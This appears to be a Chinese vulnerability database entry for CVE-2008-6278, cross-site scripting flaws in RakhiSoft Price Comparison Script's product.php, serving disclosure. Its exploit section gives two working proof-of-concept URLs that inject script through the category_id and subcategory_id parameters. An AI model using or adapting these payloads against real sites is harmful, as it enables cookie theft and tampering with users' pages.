https://www.exploit-db.com/exploits/32607
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-571
RakhiSoft Price Comparison Script 'product.php'跨站脚本攻击漏洞






漏洞ID | 1116846 | 漏洞类型 | 跨站脚本 |
发布时间 | 2008-11-28 | 更新时间 | 2009-02-26 |
![]() |
CVE-2008-6278 | ![]() |
CNNVD-200902-571 |
漏洞平台 | PHP | CVSS评分 | 4.3 |
|漏洞来源
|漏洞详情
PriceComparisonScript是一款在线购物车较脚本程序RakhiSoftwarePriceComparisonScript(又称ShoppingCart)的product.php中存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)category_id和(2)subcategory_id参数,注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/32563/info
RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.
Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1
http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>
|参考资料
来源:BID
名称:32563
链接:http://www.securityfocus.com/bid/32563
来源:SECUNIA
名称:32950
链接:http://secunia.com/advisories/32950
来源:MISC
链接:http://packetstormsecurity.com/0811-exploits/rakhi-sqlxssfpd.txt
来源:OSVDB
名称:50326
链接:http://osvdb.org/50326
检索漏洞
开始时间
结束时间